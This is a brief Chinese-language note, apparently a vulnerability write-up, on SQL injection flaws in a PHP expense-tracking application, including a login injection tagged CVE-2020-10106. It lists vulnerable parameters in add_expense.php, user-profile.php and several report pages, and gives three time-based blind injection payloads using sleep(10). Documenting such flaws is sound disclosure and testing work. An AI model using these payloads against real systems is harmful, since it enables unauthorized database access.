登录处SQL注入(CVE-2020-10106)
add_expense.php “item”参数SQL注入
payload:item=1'and (select * from (select sleep(10))x) and '1'='1
add_expense.php “costitem”参数SQL注入
payload:costitem=1'and (select * from (select sleep(10))x) and '1'='1
sqlmap没有验证成功……
user-profile.php “fullname”参数SQL注入
payload:' and (select 2323 from (select sleep(10))x) and '1' and '1
expense-yearwise-reports-detailed.php “fdate”、“tdate”、“rtype”参数SQL注入
expense-reports-detailed.php和expense-datewise-reports-detailed、expense-monthwise-reports-detailed.php都有这个问题